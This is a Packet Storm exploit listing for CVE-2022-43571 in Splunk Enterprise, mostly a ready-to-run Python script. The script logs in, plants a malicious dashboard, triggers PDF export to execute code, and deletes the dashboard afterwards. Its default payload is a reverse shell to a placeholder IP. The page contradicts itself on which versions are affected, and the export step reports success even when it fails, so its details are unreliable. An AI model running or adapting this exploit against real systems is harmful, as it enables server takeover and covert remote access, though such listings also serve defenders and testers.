PACKETSTORM 8.8 HIGH

📄 Splunk Enterprise 8.2.9 / 9.0.2 Authenticated Remote Code Execution_PACKETSTORM:215966

8.8 / 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

Proof of concept exploit for CVE-2022-43571, a critical authenticated remote code execution vulnerability affecting Splunk Enterprise versions 8.2.9 and 9.0.2. The flaw resides in the SimpleXML dashboard PDF generation process, where insufficient input...
Visit Original Source

Basic Information

ID PACKETSTORM:215966
Published Feb 20, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Splunk Enterprise 8.2.9 / 9.0.2 Authenticated Remote Code Execution via PDF Dashboard Rendering |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.splunk.com |
=============================================================================================================================================

[+] Summary : CVE‑2022‑43571 is a critical authenticated Remote Code Execution (RCE) vulnerability affecting Splunk Enterprise.
The flaw resides in the SimpleXML dashboard PDF generation process, where insufficient input sanitization allows a privileged authenticated user to inject malicious content into dashboard configurations.
When the affected dashboard is exported to PDF, the injected content may be executed in the context of the Splunk server, potentially leading to full system compromise.
Successful exploitation requires valid Splunk credentials but can result in arbitrary command execution, data exposure, and lateral movement. Splunk has released patches,
and immediate upgrading to a fixed version is strongly recommended.

[+] Usage :

pip install requests packaging

# For testing only : python poc.py -u https://splunk.example.com:8000 --username admin --password password --check-only

# To run the exploit : python poc.py -u https://splunk.example.com:8000 --username admin --password password

[+] POC :

#!/usr/bin/env python3

import requests
import random
import string
import re
import sys
import time
import urllib.parse
from typing import Optional, Dict, Tuple
import base64
import json

class SplunkExploit:
def __init__(self, target_url: str, username: str, password: str, use_inline_query: bool = False):
self.target_url = target_url.rstrip('/')
self.username = username
self.password = password
self.use_inline_query = use_inline_query
self.session = requests.Session()
self.session.verify = False
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})

self.cookie = None
self.target_app = None
self.dash_name = None

def splunk_login(self) -> Optional[str]:
"""Authenticate to Splunk and return session cookie."""
login_url = f"{self.target_url}/en-US/account/login"

resp = self.session.get(login_url)
if resp.status_code != 200:
print(f"[-] Failed to access login page: {resp.status_code}")
return None

cval_match = re.search(r'name="cval"\s+value="([^"]+)"', resp.text)
if not cval_match:
print("[-] Could not find cval token")
return None

cval = cval_match.group(1)

login_data = {
'cval': cval,
'username': self.username,
'password': self.password,
'set_has_logged_in': 'false'
}

resp = self.session.post(
f"{self.target_url}/en-US/account/login",
data=login_data,
allow_redirects=False
)

if resp.status_code in [302, 200]:

if 'splunkweb_csrf_token' in self.session.cookies:
self.cookie = f"splunkweb_csrf_token={self.session.cookies['splunkweb_csrf_token']}"
print(f"[+] Successfully logged in as {self.username}")
return self.cookie

print("[-] Login failed")
return None

def check_splunk_version(self) -> Tuple[bool, str]:
"""Check if Splunk version is vulnerable."""
if not self.cookie:
self.cookie = self.splunk_login()
if not self.cookie:
return False, "Login failed"

version_url = f"{self.target_url}/en-US/app/launcher/home"
headers = {'Cookie': self.cookie}

resp = self.session.get(version_url, headers=headers)
if resp.status_code != 200:
return False, f"Failed to access home page: {resp.status_code}"

version_match = re.search(r'Splunk®\s+([\d\.]+)', resp.text)
if version_match:
version_str = version_match.group(1)
print(f"[+] Found Splunk version: {version_str}")

from packaging import version as pkg_version

try:
v = pkg_version.parse(version_str)

if (pkg_version.parse("8.1.0") <= v <= pkg_version.parse("8.1.11")) or \
(pkg_version.parse("8.2.0") <= v <= pkg_version.parse("8.2.8")) or \
(pkg_version.parse("9.0.0") <= v <= pkg_version.parse("9.0.1")):
return True, f"Vulnerable version found: {version_str}"
else:
return False, f"Non-vulnerable version: {version_str}"
except Exception as e:
print(f"[-] Error parsing version: {e}")
return False, "Could not parse version"

return False, "Could not determine version"

def gen_inline_splunk_query(self) -> str:
"""Generate an inline Splunk query."""
row_id_name = self.random_string(8, 16)
arr_field = self.random_string(8, 16)

rand_count = random.randint(100, 500)
step = random.randint(2, 15)

col_count = random.randint(3, 10)
column_names = [self.random_string(8, 16) for _ in range(col_count)]

delimiter = random.choice([';', '|', ':', '#', '!'])
names_string = delimiter.join(column_names)

query = f"""
| makeresults count={rand_count}
| streamstats count as {row_id_name}
| eval _time = now() - ({row_id_name} * {step}),
{arr_field} = split("{names_string}", "{delimiter}"),
sourcetype = mvindex({arr_field}, {row_id_name} % {col_count})
| chart sparkline count by sourcetype
"""

return query.strip()

def get_system_index_splunk_query(self) -> str:
"""Get a query using system indexes."""
rand_tail = random.randint(100, 200)
index = random.choice(['_internal', '_audit', '_introspection'])
return f"index={index} | tail {rand_tail} | chart sparkline count by sourcetype"

def random_string(self, min_len: int = 8, max_len: int = 16) -> str:
"""Generate random alphanumeric string."""
length = random.randint(min_len, max_len)
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def get_random_app(self, enabled: bool = True) -> str:
"""Get a random app name (simplified)."""

common_apps = ['search', 'launcher', 'splunk_monitoring_console']
return random.choice(common_apps)

def create_dashboard(self, app: str, dash_name: str, template: str) -> bool:
"""Create a dashboard with malicious template."""
create_url = f"{self.target_url}/en-US/splunkd/__raw/servicesNS/{self.username}/{app}/data/ui/views"

headers = {
'Cookie': self.cookie,
'Content-Type': 'application/x-www-form-urlencoded',
'X-Splunk-Form-Key': self.get_form_key()
}

data = {
'name': dash_name,
'eai:data': template
}

resp = self.session.post(create_url, headers=headers, data=data)
if resp.status_code in [200, 201]:
print(f"[+] Dashboard '{dash_name}' created successfully")
return True

print(f"[-] Failed to create dashboard: {resp.status_code}")
print(f"Response: {resp.text[:500]}")
return False

def get_form_key(self) -> str:
"""Extract form key from Splunk page."""
home_url = f"{self.target_url}/en-US/app/launcher/home"
headers = {'Cookie': self.cookie}

resp = self.session.get(home_url, headers=headers)
if resp.status_code == 200:
match = re.search(r'formKey\s*:\s*"([^"]+)"', resp.text)
if match:
return match.group(1)

return self.random_string(32, 32)

def export_dashboard(self, app: str, dash_name: str) -> bool:
"""Trigger PDF export of dashboard to execute payload."""
export_url = f"{self.target_url}/en-US/api/pdfgen/render"

headers = {
'Cookie': self.cookie,
'Content-Type': 'application/json',
'X-Splunk-Form-Key': self.get_form_key()
}

payload = {
'serverURL': f"{self.target_url}/en-US",
'app': app,
'dashboard': dash_name,
'width': 1000,
'height': 800
}

try:
resp = self.session.post(
export_url,
headers=headers,
json=payload,
timeout=30
)

print("[+] PDF export triggered (payload execution attempted)")
return True

except Exception as e:
print(f"[*] Export request completed (expected if payload executes): {e}")
return True

def delete_dashboard(self, app: str, dash_name: str) -> bool:
"""Delete the created dashboard."""
delete_url = f"{self.target_url}/en-US/splunkd/__raw/servicesNS/{self.username}/{app}/data/ui/views/{dash_name}"

headers = {
'Cookie': self.cookie,
'X-Splunk-Form-Key': self.get_form_key()
}

resp = self.session.delete(delete_url, headers=headers)
if resp.status_code in [200, 204]:
print(f"[+] Dashboard '{dash_name}' deleted")
return True

return False

def generate_malicious_template(self, payload: str) -> str:
"""Generate malicious dashboard template with payload."""
if self.use_inline_query:
splunk_query = self.gen_inline_splunk_query()
else:
splunk_query = self.get_system_index_splunk_query()

style_param = random.choice(['lineColor', 'fillColor'])
escaped_payload = urllib.parse.quote(payload)

template = f"""<dashboard>
<row>
<panel>
<table>
<search>
<query>
{splunk_query}
</query>
</search>
<format field="sparkline" type="sparkline">
<option name="{style_param}">{escaped_payload}</option>
</format>
</table>
</panel>
</row>
</dashboard>"""

lines = template.split('\n')
return '\n'.join(line.strip() for line in lines if line.strip())

def exploit(self, reverse_shell_payload: str = None) -> bool:
"""Execute the full exploit chain."""
print("[*] Starting Splunk RCE exploit (CVE-2022-43571)")

print("[*] Attempting to login...")
if not self.splunk_login():
return False

print("[*] Checking Splunk version...")
is_vuln, msg = self.check_splunk_version()
print(f"[*] {msg}")
if not is_vuln:
print("[-] Target does not appear to be vulnerable")
return False

if not reverse_shell_payload:
# Example Python reverse shell payload
reverse_shell_payload = """__import__('os').system('python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"YOUR_IP\\\",YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"')"""

print(f"[*] Using payload: {reverse_shell_payload[:50]}...")

print("[*] Generating malicious dashboard template...")
template = self.generate_malicious_template(reverse_shell_payload)

self.target_app = self.get_random_app()
self.dash_name = self.random_string(8, 16)

print(f"[*] Target app: {self.target_app}")
print(f"[*] Dashboard name: {self.dash_name}")

print("[*] Creating dashboard...")
if not self.create_dashboard(self.target_app, self.dash_name, template):
return False

print("[*] Triggering PDF export to execute payload...")
if not self.export_dashboard(self.target_app, self.dash_name):
print("[-] Failed to trigger export")

time.sleep(5)

print("[*] Attempting to cleanup...")
self.delete_dashboard(self.target_app, self.dash_name)

print("[+] Exploit completed")
return True

def cleanup(self):
"""Cleanup created resources."""
if self.target_app and self.dash_name:
self.delete_dashboard(self.target_app, self.dash_name)

def main():
"""Main function for standalone execution."""
import argparse

parser = argparse.ArgumentParser(description='Splunk RCE Exploit (CVE-2022-43571)')
parser.add_argument('-u', '--url', required=True, help='Splunk base URL (e.g., https://splunk.example.com:8000)')
parser.add_argument('--username', default='admin', help='Splunk username (default: admin)')
parser.add_argument('--password', required=True, help='Splunk password')
parser.add_argument('--inline-query', action='store_true', help='Use inline Splunk query')
parser.add_argument('--check-only', action='store_true', help='Only check if target is vulnerable')

args = parser.parse_args()

import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

exploit = SplunkExploit(
target_url=args.url,
username=args.username,
password=args.password,
use_inline_query=args.inline_query
)

try:
if args.check_only:
is_vuln, msg = exploit.check_splunk_version()
print(f"\n{'='*50}")
print(f"Check Results: {msg}")
print(f"{'='*50}")
sys.exit(0 if is_vuln else 1)
else:
success = exploit.exploit()
sys.exit(0 if success else 1)

except KeyboardInterrupt:
print("\n[*] Exploit interrupted by user")
exploit.cleanup()
sys.exit(1)
except Exception as e:
print(f"\n[-] Error: {e}")
exploit.cleanup()
sys.exit(1)

if __name__ == "__main__":
main()

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.